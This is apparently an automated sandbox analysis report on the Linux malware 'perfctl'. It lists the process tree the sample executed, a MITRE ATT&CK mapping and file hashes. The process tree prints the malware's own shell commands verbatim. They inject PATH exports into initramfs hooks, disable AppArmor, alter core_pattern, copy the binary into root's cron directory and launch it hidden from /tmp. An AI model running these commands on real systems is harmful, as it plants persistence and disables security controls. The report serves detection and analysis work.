/tmp/.perf.c/systemctlsystemctl try-restart systemd-journald.service4⤵
-
/tmp/systemctlsystemctl try-restart systemd-journald.service4⤵
-
/usr/local/sbin/systemctlsystemctl try-restart systemd-journald.service4⤵
-
/usr/local/bin/systemctlsystemctl try-restart systemd-journald.service4⤵
-
/usr/sbin/systemctlsystemctl try-restart systemd-journald.service4⤵
-
/usr/bin/systemctlsystemctl try-restart systemd-journald.service4⤵
-
/tmp/.perf.c/systemctlsystemctl try-restart unattended-upgrades.service4⤵
-
/tmp/systemctlsystemctl try-restart unattended-upgrades.service4⤵
-
/usr/local/sbin/systemctlsystemctl try-restart unattended-upgrades.service4⤵
-
/usr/local/bin/systemctlsystemctl try-restart unattended-upgrades.service4⤵
-
/usr/sbin/systemctlsystemctl try-restart unattended-upgrades.service4⤵
-
/usr/bin/systemctlsystemctl try-restart unattended-upgrades.service4⤵
-
/bin/sh/bin/sh -c "echo '/etc/coredumps/%e.%p.%u.%t' > /proc/sys/kernel/core_pattern"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/bin/sh/bin/sh -c "for f in \$(find /usr/share/initramfs-tools/hooks -type f 2>/dev/null|xargs grep -s -l 'ldd '|xargs grep -L 'export PATH=.*/\\.local/bin:.PATH');do sed -i '/^#!\\//a export PATH=/bin/.local/bin:\$PATH' \$f;done"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/findfind /usr/share/initramfs-tools/hooks -type f3⤵
-
/usr/bin/xargsxargs grep -s -l "ldd "3⤵
-
/tmp/.perf.c/grepgrep -s -l "ldd " /usr/share/initramfs-tools/hooks/mdadm /usr/share/initramfs-tools/hooks/thin-provisioning-tools /usr/share/initramfs-tools/hooks/brltty /usr/share/initramfs-tools/hooks/console_setup /usr/share/initramfs-tools/hooks/iscsi /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptkeyctl /usr/share/initramfs-tools/hooks/resume /usr/share/initramfs-tools/hooks/thermal /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/bcache /usr/share/initramfs-tools/hooks/plymouth /usr/share/initramfs-tools/hooks/cryptgnupg /usr/share/initramfs-tools/hooks/cryptroot /usr/share/initramfs-tools/hooks/zz-busybox-initramfs /usr/share/initramfs-tools/hooks/fsck /usr/share/initramfs-tools/hooks/sg3-utils /usr/share/initramfs-tools/hooks/klibc-utils /usr/share/initramfs-tools/hooks/xfs /usr/share/initramfs-tools/hooks/framebuffer /usr/share/initramfs-tools/hooks/kmod /usr/share/initramfs-tools/hooks/udev /usr/share/initramfs-tools/hooks/fixrtc /usr/share/initramfs-tools/hooks/intel_microcode /usr/share/initramfs-tools/hooks/cryptroot-unlock /usr/share/initramfs-tools/hooks/cryptgnupg-sc /usr/share/initramfs-tools/hooks/amd64_microcode /usr/share/initramfs-tools/hooks/fuse /usr/share/initramfs-tools/hooks/kbd /usr/share/initramfs-tools/hooks/ntfs_3g /usr/share/initramfs-tools/hooks/lvm2 /usr/share/initramfs-tools/hooks/dmsetup /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/cryptpassdev4⤵
-
/tmp/grepgrep -s -l "ldd " /usr/share/initramfs-tools/hooks/mdadm /usr/share/initramfs-tools/hooks/thin-provisioning-tools /usr/share/initramfs-tools/hooks/brltty /usr/share/initramfs-tools/hooks/console_setup /usr/share/initramfs-tools/hooks/iscsi /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptkeyctl /usr/share/initramfs-tools/hooks/resume /usr/share/initramfs-tools/hooks/thermal /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/bcache /usr/share/initramfs-tools/hooks/plymouth /usr/share/initramfs-tools/hooks/cryptgnupg /usr/share/initramfs-tools/hooks/cryptroot /usr/share/initramfs-tools/hooks/zz-busybox-initramfs /usr/share/initramfs-tools/hooks/fsck /usr/share/initramfs-tools/hooks/sg3-utils /usr/share/initramfs-tools/hooks/klibc-utils /usr/share/initramfs-tools/hooks/xfs /usr/share/initramfs-tools/hooks/framebuffer /usr/share/initramfs-tools/hooks/kmod /usr/share/initramfs-tools/hooks/udev /usr/share/initramfs-tools/hooks/fixrtc /usr/share/initramfs-tools/hooks/intel_microcode /usr/share/initramfs-tools/hooks/cryptroot-unlock /usr/share/initramfs-tools/hooks/cryptgnupg-sc /usr/share/initramfs-tools/hooks/amd64_microcode /usr/share/initramfs-tools/hooks/fuse /usr/share/initramfs-tools/hooks/kbd /usr/share/initramfs-tools/hooks/ntfs_3g /usr/share/initramfs-tools/hooks/lvm2 /usr/share/initramfs-tools/hooks/dmsetup /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/cryptpassdev4⤵
-
/usr/local/sbin/grepgrep -s -l "ldd " /usr/share/initramfs-tools/hooks/mdadm /usr/share/initramfs-tools/hooks/thin-provisioning-tools /usr/share/initramfs-tools/hooks/brltty /usr/share/initramfs-tools/hooks/console_setup /usr/share/initramfs-tools/hooks/iscsi /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptkeyctl /usr/share/initramfs-tools/hooks/resume /usr/share/initramfs-tools/hooks/thermal /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/bcache /usr/share/initramfs-tools/hooks/plymouth /usr/share/initramfs-tools/hooks/cryptgnupg /usr/share/initramfs-tools/hooks/cryptroot /usr/share/initramfs-tools/hooks/zz-busybox-initramfs /usr/share/initramfs-tools/hooks/fsck /usr/share/initramfs-tools/hooks/sg3-utils /usr/share/initramfs-tools/hooks/klibc-utils /usr/share/initramfs-tools/hooks/xfs /usr/share/initramfs-tools/hooks/framebuffer /usr/share/initramfs-tools/hooks/kmod /usr/share/initramfs-tools/hooks/udev /usr/share/initramfs-tools/hooks/fixrtc /usr/share/initramfs-tools/hooks/intel_microcode /usr/share/initramfs-tools/hooks/cryptroot-unlock /usr/share/initramfs-tools/hooks/cryptgnupg-sc /usr/share/initramfs-tools/hooks/amd64_microcode /usr/share/initramfs-tools/hooks/fuse /usr/share/initramfs-tools/hooks/kbd /usr/share/initramfs-tools/hooks/ntfs_3g /usr/share/initramfs-tools/hooks/lvm2 /usr/share/initramfs-tools/hooks/dmsetup /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/cryptpassdev4⤵
-
/usr/local/bin/grepgrep -s -l "ldd " /usr/share/initramfs-tools/hooks/mdadm /usr/share/initramfs-tools/hooks/thin-provisioning-tools /usr/share/initramfs-tools/hooks/brltty /usr/share/initramfs-tools/hooks/console_setup /usr/share/initramfs-tools/hooks/iscsi /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptkeyctl /usr/share/initramfs-tools/hooks/resume /usr/share/initramfs-tools/hooks/thermal /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/bcache /usr/share/initramfs-tools/hooks/plymouth /usr/share/initramfs-tools/hooks/cryptgnupg /usr/share/initramfs-tools/hooks/cryptroot /usr/share/initramfs-tools/hooks/zz-busybox-initramfs /usr/share/initramfs-tools/hooks/fsck /usr/share/initramfs-tools/hooks/sg3-utils /usr/share/initramfs-tools/hooks/klibc-utils /usr/share/initramfs-tools/hooks/xfs /usr/share/initramfs-tools/hooks/framebuffer /usr/share/initramfs-tools/hooks/kmod /usr/share/initramfs-tools/hooks/udev /usr/share/initramfs-tools/hooks/fixrtc /usr/share/initramfs-tools/hooks/intel_microcode /usr/share/initramfs-tools/hooks/cryptroot-unlock /usr/share/initramfs-tools/hooks/cryptgnupg-sc /usr/share/initramfs-tools/hooks/amd64_microcode /usr/share/initramfs-tools/hooks/fuse /usr/share/initramfs-tools/hooks/kbd /usr/share/initramfs-tools/hooks/ntfs_3g /usr/share/initramfs-tools/hooks/lvm2 /usr/share/initramfs-tools/hooks/dmsetup /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/cryptpassdev4⤵
-
/usr/sbin/grepgrep -s -l "ldd " /usr/share/initramfs-tools/hooks/mdadm /usr/share/initramfs-tools/hooks/thin-provisioning-tools /usr/share/initramfs-tools/hooks/brltty /usr/share/initramfs-tools/hooks/console_setup /usr/share/initramfs-tools/hooks/iscsi /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptkeyctl /usr/share/initramfs-tools/hooks/resume /usr/share/initramfs-tools/hooks/thermal /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/bcache /usr/share/initramfs-tools/hooks/plymouth /usr/share/initramfs-tools/hooks/cryptgnupg /usr/share/initramfs-tools/hooks/cryptroot /usr/share/initramfs-tools/hooks/zz-busybox-initramfs /usr/share/initramfs-tools/hooks/fsck /usr/share/initramfs-tools/hooks/sg3-utils /usr/share/initramfs-tools/hooks/klibc-utils /usr/share/initramfs-tools/hooks/xfs /usr/share/initramfs-tools/hooks/framebuffer /usr/share/initramfs-tools/hooks/kmod /usr/share/initramfs-tools/hooks/udev /usr/share/initramfs-tools/hooks/fixrtc /usr/share/initramfs-tools/hooks/intel_microcode /usr/share/initramfs-tools/hooks/cryptroot-unlock /usr/share/initramfs-tools/hooks/cryptgnupg-sc /usr/share/initramfs-tools/hooks/amd64_microcode /usr/share/initramfs-tools/hooks/fuse /usr/share/initramfs-tools/hooks/kbd /usr/share/initramfs-tools/hooks/ntfs_3g /usr/share/initramfs-tools/hooks/lvm2 /usr/share/initramfs-tools/hooks/dmsetup /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/cryptpassdev4⤵
-
/usr/bin/grepgrep -s -l "ldd " /usr/share/initramfs-tools/hooks/mdadm /usr/share/initramfs-tools/hooks/thin-provisioning-tools /usr/share/initramfs-tools/hooks/brltty /usr/share/initramfs-tools/hooks/console_setup /usr/share/initramfs-tools/hooks/iscsi /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptkeyctl /usr/share/initramfs-tools/hooks/resume /usr/share/initramfs-tools/hooks/thermal /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/bcache /usr/share/initramfs-tools/hooks/plymouth /usr/share/initramfs-tools/hooks/cryptgnupg /usr/share/initramfs-tools/hooks/cryptroot /usr/share/initramfs-tools/hooks/zz-busybox-initramfs /usr/share/initramfs-tools/hooks/fsck /usr/share/initramfs-tools/hooks/sg3-utils /usr/share/initramfs-tools/hooks/klibc-utils /usr/share/initramfs-tools/hooks/xfs /usr/share/initramfs-tools/hooks/framebuffer /usr/share/initramfs-tools/hooks/kmod /usr/share/initramfs-tools/hooks/udev /usr/share/initramfs-tools/hooks/fixrtc /usr/share/initramfs-tools/hooks/intel_microcode /usr/share/initramfs-tools/hooks/cryptroot-unlock /usr/share/initramfs-tools/hooks/cryptgnupg-sc /usr/share/initramfs-tools/hooks/amd64_microcode /usr/share/initramfs-tools/hooks/fuse /usr/share/initramfs-tools/hooks/kbd /usr/share/initramfs-tools/hooks/ntfs_3g /usr/share/initramfs-tools/hooks/lvm2 /usr/share/initramfs-tools/hooks/dmsetup /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/cryptpassdev4⤵
-
/usr/bin/xargsxargs grep -L "export PATH=.*/\\.local/bin:.PATH"3⤵
-
/tmp/.perf.c/grepgrep -L "export PATH=.*/\\.local/bin:.PATH" /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptroot4⤵
-
/tmp/grepgrep -L "export PATH=.*/\\.local/bin:.PATH" /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptroot4⤵
-
/usr/local/sbin/grepgrep -L "export PATH=.*/\\.local/bin:.PATH" /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptroot4⤵
-
/usr/local/bin/grepgrep -L "export PATH=.*/\\.local/bin:.PATH" /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptroot4⤵
-
/usr/sbin/grepgrep -L "export PATH=.*/\\.local/bin:.PATH" /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptroot4⤵
-
/usr/bin/grepgrep -L "export PATH=.*/\\.local/bin:.PATH" /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptroot4⤵
-
/bin/sh/bin/sh -c "systemctl daemon-reload;systemctl enable kmodaudit.timer;systemctl start kmodaudit.timer"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/systemctlsystemctl daemon-reload3⤵
-
/usr/bin/systemctlsystemctl enable kmodaudit.timer3⤵
-
/usr/bin/systemctlsystemctl start kmodaudit.timer3⤵
-
/bin/sh/bin/sh -c "if systemctl status apparmor|grep -q 'enabled;';then systemctl stop apparmor;systemctl disable apparmor;fi"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/systemctlsystemctl status apparmor3⤵
-
/usr/bin/grepgrep -q "enabled;"3⤵
-
/usr/bin/systemctlsystemctl stop apparmor3⤵
-
/usr/bin/systemctlsystemctl disable apparmor3⤵
- Changes its process name
-
/usr/bin/getoptgetopt -o r: --long root: -- disable apparmor4⤵
-
/usr/sbin/update-rc.d/usr/sbin/update-rc.d apparmor defaults4⤵
-
/tmp/.perf.c/systemctlsystemctl daemon-reload5⤵
-
/tmp/systemctlsystemctl daemon-reload5⤵
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
-
/usr/sbin/update-rc.d/usr/sbin/update-rc.d apparmor disable4⤵
-
/tmp/.perf.c/systemctlsystemctl daemon-reload5⤵
-
/tmp/systemctlsystemctl daemon-reload5⤵
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
-
/usr/bin/whowho2⤵
-
/bin/sh/bin/sh -c "who | wc -l"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/whowho3⤵
-
/usr/bin/wcwc -l3⤵
-
/bin/sh/bin/sh -c "killall -9 perfctl;pkill -9 perfctl"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/killallkillall -9 perfctl3⤵
- Reads runtime system information
-
/usr/bin/pkillpkill -9 perfctl3⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/sh/bin/sh -c "ps -ax|grep perfctl|grep -v grep|awk '{print \$1}'|xargs kill -9"2⤵
-
/usr/bin/psps -ax3⤵
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
-
/usr/bin/grepgrep perfctl3⤵
-
/usr/bin/grepgrep -v grep3⤵
-
/usr/bin/awkawk "{print \$1}"3⤵
-
/usr/bin/xargsxargs kill -93⤵
-
/tmp/.perf.c/killkill -94⤵
-
/tmp/killkill -94⤵
-
/usr/local/sbin/killkill -94⤵
-
/usr/local/bin/killkill -94⤵
-
/usr/sbin/killkill -94⤵
-
/usr/bin/killkill -94⤵
-
/bin/sh/bin/sh -c "killall -9 obfs4proxy;pkill -9 obfs4proxy"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/killallkillall -9 obfs4proxy3⤵
- Reads runtime system information
-
/usr/bin/pkillpkill -9 obfs4proxy3⤵
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
-
/bin/sh/bin/sh -c "ps -ax|grep obfs4proxy|grep -v grep|awk '{print \$1}'|xargs kill -9"2⤵
-
/usr/bin/psps -ax3⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/grepgrep obfs4proxy3⤵
-
/usr/bin/grepgrep -v grep3⤵
-
/usr/bin/awkawk "{print \$1}"3⤵
-
/usr/bin/xargsxargs kill -93⤵
-
/tmp/.perf.c/killkill -94⤵
-
/tmp/killkill -94⤵
-
/usr/local/sbin/killkill -94⤵
-
/usr/local/bin/killkill -94⤵
-
/usr/sbin/killkill -94⤵
-
/usr/bin/killkill -94⤵
-
/usr/bin/shsh -c "rm -f /tmp/.xdiag/tordata/torrc-* 2>/dev/null"2⤵
-
/usr/bin/rmrm -f "/tmp/.xdiag/tordata/torrc-*"3⤵
-
/bin/sh/bin/sh -c "who | wc -l"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/whowho3⤵
-
/usr/bin/wcwc -l3⤵
-
/bin/sh/bin/sh -c "who | wc -l"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/whowho3⤵
-
/usr/bin/wcwc -l3⤵
-
/bin/sh/bin/sh -c "who | wc -l"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/whowho3⤵
-
/usr/bin/wcwc -l3⤵
-
/bin/sh/bin/sh -c "who | wc -l"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/whowho3⤵
-
/usr/bin/wcwc -l3⤵
-
/bin/sh/bin/sh -c "who | wc -l"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/whowho3⤵
-
/usr/bin/wcwc -l3⤵
-
/bin/sh/bin/sh -c "who | wc -l"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/whowho3⤵
-
/usr/bin/wcwc -l3⤵
-
/bin/sh/bin/sh -c "who | wc -l"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/whowho3⤵
-
/usr/bin/wcwc -l3⤵
-
/usr/bin/chmodchmod -R 777 /tmp/.xdiag/data2⤵
- File and Directory Permissions Modification
- Modifies special file permissions
-
/usr/bin/getentgetent passwd 02⤵
- Disables SELinux
-
/bin/sh/bin/sh -c "who | wc -l"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/whowho3⤵
-
/usr/bin/wcwc -l3⤵
-
/bin/sh/bin/sh -c "cp /proc/2500/exe /root/.config/cron/perfcc && chmod +x /root/.config/cron/perfcc"2⤵
- File and Directory Permissions Modification
-
/usr/bin/cpcp /proc/2500/exe /root/.config/cron/perfcc3⤵
-
/usr/bin/chmodchmod +x /root/.config/cron/perfcc3⤵
- File and Directory Permissions Modification
- Modifies special file permissions
-
/bin/sh/bin/sh -c "find /var/spool/cron/crontabs -type f 2>/dev/null|grep cron|grep '/root\$'|xargs cat"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/findfind /var/spool/cron/crontabs -type f3⤵
-
/usr/bin/grepgrep cron3⤵
-
/usr/bin/grepgrep "/root\$"3⤵
-
/usr/bin/xargsxargs cat3⤵
-
/tmp/.perf.c/catcat /var/spool/cron/crontabs/root4⤵
-
/tmp/catcat /var/spool/cron/crontabs/root4⤵
-
/usr/local/sbin/catcat /var/spool/cron/crontabs/root4⤵
-
/usr/local/bin/catcat /var/spool/cron/crontabs/root4⤵
-
/usr/sbin/catcat /var/spool/cron/crontabs/root4⤵
-
/usr/bin/catcat /var/spool/cron/crontabs/root4⤵
-
/bin/sh/bin/sh -c "echo '/etc/coredumps/%e.%p.%u.%t' > /proc/sys/kernel/core_pattern"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/bin/sh/bin/sh -c "who | wc -l"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/whowho3⤵
-
/usr/bin/wcwc -l3⤵
-
/bin/sh/bin/sh -c "who | wc -l"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/whowho3⤵
-
/usr/bin/wcwc -l3⤵
-
/bin/sh/bin/sh -c "who | wc -l"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/whowho3⤵
-
/usr/bin/wcwc -l3⤵
-
/bin/sh/bin/sh -c "who | wc -l"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/whowho3⤵
-
/usr/bin/wcwc -l3⤵
-
/bin/sh/bin/sh -c "who | wc -l"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/whowho3⤵
-
/usr/bin/wcwc -l3⤵
-
/bin/sh/bin/sh -c "who | wc -l"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/whowho3⤵
-
/usr/bin/wcwc -l3⤵
-
/usr/bin/chmodchmod -R 755 /tmp/.xdiag2⤵
- File and Directory Permissions Modification
- Modifies special file permissions
-
/usr/bin/chmodchmod -R 777 /tmp/.xdiag/data2⤵
- File and Directory Permissions Modification
- Modifies special file permissions
-
/bin/sh/bin/sh -c "who | wc -l"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/whowho3⤵
-
/usr/bin/wcwc -l3⤵
-
/bin/sh/bin/sh -c "who | wc -l"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/whowho3⤵
-
/usr/bin/wcwc -l3⤵
-
/bin/sh/bin/sh -c "who | wc -l"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/whowho3⤵
-
/usr/bin/wcwc -l3⤵
-
/bin/sh/bin/sh -c "PATH=/tmp/.perf.c:\$PATH;export AAPCRK=c1cH3IVckE39;nohup perfctl >/dev/null 2>/dev/null & exit"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/nohupnohup perfctl3⤵
-
/bin/sh/bin/sh -c "who | wc -l"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/whowho3⤵
-
/usr/bin/wcwc -l3⤵
-
/bin/sh/bin/sh -c "cp /proc/2500/exe /root/.config/cron/perfcc && chmod +x /root/.config/cron/perfcc"2⤵
- File and Directory Permissions Modification
-
/usr/bin/cpcp /proc/2500/exe /root/.config/cron/perfcc3⤵
-
/usr/bin/chmodchmod +x /root/.config/cron/perfcc3⤵
- File and Directory Permissions Modification
- Modifies special file permissions
-
/bin/sh/bin/sh -c "find /var/spool/cron/crontabs -type f 2>/dev/null|grep cron|grep '/root\$'|xargs cat"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/findfind /var/spool/cron/crontabs -type f3⤵
-
/usr/bin/grepgrep cron3⤵
-
/usr/bin/grepgrep "/root\$"3⤵
-
/usr/bin/xargsxargs cat3⤵
-
/tmp/.perf.c/catcat /var/spool/cron/crontabs/root4⤵
-
/tmp/catcat /var/spool/cron/crontabs/root4⤵
-
/usr/local/sbin/catcat /var/spool/cron/crontabs/root4⤵
-
/usr/local/bin/catcat /var/spool/cron/crontabs/root4⤵
-
/usr/sbin/catcat /var/spool/cron/crontabs/root4⤵
-
/usr/bin/catcat /var/spool/cron/crontabs/root4⤵
-
/bin/sh/bin/sh -c "echo '/etc/coredumps/%e.%p.%u.%t' > /proc/sys/kernel/core_pattern"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/bin/sh/bin/sh -c "who | wc -l"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/whowho3⤵
-
/usr/bin/wcwc -l3⤵
-
/tmp/.perf.c/perfctlperfctl1⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1Unix Shell
1Scheduled Task/Job
1Cron
1Shared Modules
1Persistence
Boot or Logon Autostart Execution
2XDG Autostart Entries
1Create or Modify System Process
1Systemd Service
1Event Triggered Execution
1Unix Shell Configuration Modification
1Hijack Execution Flow
2Dynamic Linker Hijacking
1Path Interception by PATH Environment Variable
1Scheduled Task/Job
1Cron
1Privilege Escalation
Abuse Elevation Control Mechanism
1Setuid and Setgid
1Boot or Logon Autostart Execution
2XDG Autostart Entries
1Create or Modify System Process
1Systemd Service
1Event Triggered Execution
1Unix Shell Configuration Modification
1Hijack Execution Flow
2Dynamic Linker Hijacking
1Path Interception by PATH Environment Variable
1Scheduled Task/Job
1Cron
1Defense Evasion
Abuse Elevation Control Mechanism
1Setuid and Setgid
1File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Hijack Execution Flow
2Dynamic Linker Hijacking
1Path Interception by PATH Environment Variable
1Impair Defenses
1Disable or Modify Tools
1Indicator Removal
2Clear Command History
1Timestomp
1Virtualization/Sandbox Evasion
3System Checks
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
17B
MD56b1a793f9ba2e9592272a5b34929ad25
SHA1f91e27462ee3e809b5972e093155c29755594aca
SHA2565d84e63927fda2949bbf96f2e8a4797233a20e1bb30943594cb29ac60136131c
SHA5125a2798cb1895d1c8fcac0a6dcf1b95132ddbf007e28512766d706e22ab53f8f554737fdef679dd1852e319e71fac3ac06fc1d436b58bce0a32cd90b7caf0758a
-
Filesize
582B
MD5eead65ce52555282382e27bc87297fb4
SHA1031576d11f04a8e88d16afb1d249b7944b2037fb
SHA256df6b8d0466873294f01b0b1b457615beb9ab041acd21e80f9e75a955f9111bcf
SHA5123e0356d717c9a80261d757367e4afd2bbdd91373bf670292199be27b822910db4c94a5c2d561f770beaf7de7acd4924ff39875608a06926fb20de40f1c556877
-
Filesize
279B
MD58b2da5f899812804b5545d186941fd0e
SHA1addbaf2140b433934b75a0f58bd4ced35d8a2b4f
SHA2569d113848aafa9670100d9973963de30b1cc56f3ec465318d29c80b09384fdd70
SHA512ab99a3a9a8f1def55d16fd16a565c97d23334c7b2dad91cd7f62bc5b11b75f47e0b233311fcf54f444d8bfb75a8a453b68b3640c69ee66e66e6241bb0b7c05d2
-
Filesize
8.9MB
MD5656e22c65bf7c04d87b5afbe52b8d800
SHA10fd199053171fec86be186106eac717c4edae2ad
SHA25622e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13
SHA512697954f75e391a6cc600b7d40509ac1a1515cb0a4234cc3ae4270beaf7bbc3a3da23a9cd4f25e0eb4f5956d24ca3866e2574dc9493644845aac1063e1e4b0183
-
Filesize
214B
MD557ce0c5287f51b23cc30113afa646e4c
SHA1440ee6e8c026795936ac91c1e2584a381963b0b6
SHA2563b7327e5d64644c87ecba78f1b665379700968b8a68628470fc0afee1e8a85d2
SHA51286b00207940b35d8eb6c07493ae9b582b183374634808a6582b94c196c95e9f59a154a3d235c2b78a3c3c0f51342cc32601093723b9420d5cdb436398d89cf0a
-
Filesize
4B
MD573f104c9fba50050eea11d9d075247cc
SHA14b51fbf06972de1dc64623085d8d09cb76758a18
SHA25645d823d25b097fa8b7dfd0abaf70c0dcd896ded3720f4e1d3196f6c39308cd8d
SHA5125902e92d758081d374db4c2df607ffa95f637c9fb56f9c126fdb6b68ff9b757a00e4ace4e456e007cd3cdf45a9b8efd70ca02f0d3475fc6a0ef23cdd21736242
-
Filesize
1.6MB
MD56e7230dbe35df5b46dcd08975a0cc87f
SHA13de0a2f76f95375c1c078a465683415bda99f01b
SHA256e16fb2a22fce5241565784b5a8518ed2becc9948d4c398093edbb70a946f9331
SHA512df5c9caaebec5adbc291f11b27a003602e6e01a25634c920e4cc4cc1f204845849f9967357a9f2a53b5799ce460ceeea04a3f04e03256fc46668becaa801dd5d
-
Filesize
36B
MD53ec636b2bf412c3c5727d51d3233622e
SHA16999eef6717eb9e4bd148e90fbd5cce396160142
SHA2564d9dde36705f10afcca9ea4eb3e925603f5ecbc997d1bdcfc82313fdfb01bbb5
SHA5127973f4598778cb295d1871233f202031e4d415271b317719abdb769e20fa660ccb06e33e08e0d92d0aa12434a2cc00f08a29a428060df609eb2d0cbba345fd7d
-
Filesize
6B
MD57caa701b2bd5a182b80c72b9bdf88e2d
SHA124a1733ca8bb0ae45a3ffd1eeddc926b2fc5841f
SHA256d15690f08a575024650b01ffac892cfd2b93e6c57c140f1b6d9e47753cabd579
SHA512ef460e752178cb4db5b2caec975120f1bb99a31cb51c2c12c47c8c8529e18abc37efc0132ff63388baedab91051aa3f93363bd0752e292da054001e0cae3d0bb
-
Filesize
105B
MD5e31f36eeef3ff930b8cd96d50101322e
SHA1c073ffab816bc97e6ff0185befe9b11b2f0451d1
SHA2567980732730c7e118c2d53ef43ad1245b12ac07f677157dc4eb43af1f2480864d
SHA51274497e9efd3575421040558a20aaf3706d0202ee53610388ae2c6acb90647dd90120fde3126f5ca52ba98653a6a61e7c88dcbadaa3ab5496f5a527c30deb9b31
-
Filesize
13B
MD517bcf11dc5f1fa6c48a1a856a72f1119
SHA1873ec0cbd312762df3510b8cccf260dc0a23d709
SHA256a7bf504871a46343c2feab9d923e01b9dca4e980b2e122ad55fd4dbb3f6c16d9
SHA5129c12db4c6a105e767ff27048d2f8f19de5c9721ce6503dbb497aedcc1fc8b910a6fa43ec987fecd26794aff7440cb984744698fec5741dd73400a299dc3b2a25
-
Filesize
7B
MD51119efd67e02c8cd879f82ac09fc4b0d
SHA16c6f10c80f975edf95a23a42c47ce43fdd45432d
SHA256621bd1efc8ba6575c1bdb629b261d8ab6bff5182b564e5cb941956514f8ad865
SHA512f1bde4ec683b5a8a0f86fc9f26ebb3cb7fdc0ddaf4e467712ec0db0cf71af4330d44490a9bf30cc8b30ca7ce47f0fc6b770c0ca6a4ad12f833160712c46913fa
-
Filesize
67B
MD511bc860262379c820277e89f5f115ad2
SHA1120a368751a2f3c586bac412c34a9d6c6e139dec
SHA25659faaf4389ad6272b292207687c8e7f828785f8aaa5ca3749edbca29b42403b7
SHA512c2062504de914a75085d09d4206a588c5861ed3d533101b19a6a026c475a6b8cb40c41fe9c05a942ef2827a8d978b12b81c56b76d2e39c48df5ace52e4b273cb
-
Filesize
4B
MD5f7696a9b362ac5a51c3dc8f098b73923
